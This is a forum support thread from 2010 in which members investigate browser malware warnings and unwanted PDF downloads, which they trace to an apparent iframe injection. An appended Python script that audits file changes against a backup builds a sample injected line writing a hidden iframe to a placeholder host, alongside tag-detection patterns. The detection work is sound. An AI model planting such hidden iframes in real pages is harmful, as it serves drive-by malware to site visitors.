Malware detected

Discussion in 'Forum Support & Feedback' started by RWA, Jun 26, 2010.

  1. Anthony

    Anthony

    Joined:
    Oct 17, 2004
    Messages:
    17,274
    Thanks for the report, guys.

    We're looking into this as a matter of urgency.

    I haven't been able to re-create the warning messages that you are currently seeing, but the screenshots are proving helpful as we try to investigate further.

    Update: Inspection of Google Webmaster Tools confirms no malware detected. Possibly an external site or reference to a URL which is being flagged and not anything to do with our site. Either way, we must locate this reference if indeed that is the case and remove it.
  2. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    When I tried viewing this thread my browser just automatically downloaded a PDF again. I've just checked where it is coming from and it is:

    Replace DOT with a .
  3. Anthony

    Anthony

    Joined:
    Oct 17, 2004
    Messages:
    17,274
    I don't doubt that this is happening to you, although I must say that I have been unable to recreate any of the events depicted in this thread. I have no malware warnings and certainly no files being downloaded upon viewing the site. Our server technical support confirmed the same at their end, too.

    In the interests of self-preservation I think that it would be advisable to run a malware scan, clear your cache, cookies and temporary Internet files and run a virus scan on your current PC. This should clear out anything that may be currently on your PC. After that, it would be good if you could return to the forum and see if it happens again. Please keep a note of exactly what happens as this can be used in our investigation. We must find the source and find it quick if indeed there is an exploit within the forum or via a reference URL.

    I would be interested to hear from anyone else who is experiencing these specific symptoms, i.e. files being downloaded.

    Thanks.
  4. Saajan

    Saajan

    Joined:
    Oct 30, 2005
    Messages:
    10,736
    Where is the PDF store?
  5. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    I will do that now. Although it only seems to be happening with this site :\.
  6. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    Sorry, I don't quite understand?
  7. Pete

    Pete

    Joined:
    May 30, 2005
    Messages:
    14,067
    No problems for me at this point.
  8. uhafmail

    uhafmail

    Joined:
    Aug 25, 2008
    Messages:
    6,468
    You have said that a PDF has been downloaded, but downloaded to where? Obviously we know it is on your computer, but where on the system?
  9. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    It just downloaded like a usual file would. It appeared at the bottom in the blue download bar which Chrome has. It just saved to my normal downloads folder. myusername/Downloads/

    If you wish I can upload the files to somewhere for you? I tried opening them in VMWare (sandbox) in case they were infected. But it seems they can't even be opened and are corrupt.
  10. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    I'm not getting any warning in Chrome on my laptop but in Firefox I did notice the status bar saying 'Waiting for btomiumgop....', when I first went onto the site http://www.thewholesaleforums.co.uk/forum/ no reference in the page source to this.
  11. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
  12. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    Struggling to recreate the bt.....gop thing but I can recreate the source of the Chrome warning. I have to clear my cache to do this as it only appears on the first load and not subsequent pages; if the cache is cleared it does seem to appear on any page.

    Here are the HTTP requests when loading http://www.thewholesaleforums.co.uk/forum

    Looks like Firefox just blocks it without giving a warning
  13. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    Right, I just scanned my comp with 3 AVs. All comes out clean.

    I also just decided to try it in Firefox and although no warning I did see this at the bottom (the btom thing).

    Link

    It also told me I needed to install a plugin when viewing the site. It's just a general Acrobat plugin for FF, however I have never used FF on this computer, so most of you probably already have it installed.

    Link

    PS: Just asked a friend to check, it appeared for them too (the thing in the first image). It seems to only happen the first time you come here. If I refresh now it doesn't appear?
  14. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    I would check REMOVED and compare it to a backup. It appears to contain javascript and is always the forum file above the openpwn request.
  15. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    Try it with the Firefox HttpFox plugin which monitors all the HTTP requests when loading the page. When it's open you need to click start then click the forum link to refresh the page, then stop it before clicking any other link
  16. PhoenixFalls

    PhoenixFalls Banned Member

    Joined:
    Feb 3, 2010
    Messages:
    24
    A PDF has just been automatically downloaded to my computer... goes to default download folder.

    A screenshot of browser window as it happened is attached. There is no PDF icon, because I currently have no software to open it.
  17. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    That's the same kind of file names the ones that got downloaded to me have. Also, if you look at the permissions of the PDF, it has permission to Write, Execute, Read & basically do whatever it wants. I would delete it ASAP.
  18. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    Just checked, it seems that file is infected.

    Link

    However, it only does this once. Once I refresh that page, the harmful code has gone. Which would explain why the PDF only gets downloaded once.
  19. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    My message was aimed at Anthony, as you don't see the content of a php file on the client side.

    Looks like the file has had an iframe injection attack
  20. PhoenixFalls

    PhoenixFalls Banned Member

    Joined:
    Feb 3, 2010
    Messages:
    24

    That PHP file acts as a JavaScript one, what we see is the output of the PHP. It's requested on each page, though I don't know its original intention. Now it directs the request to the same server where the PDFs are downloaded from.
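
Added example, not part of the thread or the forum's own code: one way to carry out the "compare it to a backup" check suggested above and surface an injected iframe. It works on the file as stored on the server, so the first-load-only behaviour described in the thread does not hide the change. The file contents and the hosts `forum.example` and `injected.example` are constructed placeholders.

```python
import difflib
import re
from urllib.parse import urlparse

# Constructed sample data; hosts and file contents are placeholders.
TRUSTED_HOSTS = {"forum.example"}
BACKUP = """<?php
header('Content-Type: application/javascript');
echo "var forumReady = true;";
"""
INJECTED_LINE = r'''echo "document.write('<iframe src=\"http://injected.example/in.php\" width=1 height=1></iframe>');";'''
DEPLOYED = BACKUP + INJECTED_LINE + "\n"

# URLs (absolute or protocol-relative) and the tags typically used to pull
# remote content into a page.
URL_RE = re.compile(r"""(?:https?:)?//[^\s'"<>\\)]+""", re.I)
TAG_RE = re.compile(r"<\s*(iframe|script)\b", re.I)


def added_lines(backup, deployed):
    """Yield (line_number, text) for lines in deployed that the backup lacks."""
    old, new = backup.splitlines(), deployed.splitlines()
    matcher = difflib.SequenceMatcher(None, old, new, autojunk=False)
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            for j in range(j1, j2):
                yield j + 1, new[j]


def audit(backup, deployed, trusted=TRUSTED_HOSTS):
    """Report added lines that introduce iframe/script tags or untrusted hosts."""
    findings = []
    for lineno, text in added_lines(backup, deployed):
        hosts = set()
        for url in URL_RE.findall(text):
            full = url if url.lower().startswith("http") else "http:" + url
            hosts.add(urlparse(full).hostname)
        foreign = sorted(h for h in hosts if h and h not in trusted)
        tags = sorted({t.lower() for t in TAG_RE.findall(text)})
        if foreign or tags:
            findings.append({"line": lineno, "tags": tags, "foreign_hosts": foreign})
    return findings


if __name__ == "__main__":
    for finding in audit(BACKUP, DEPLOYED):
        print(finding)
```
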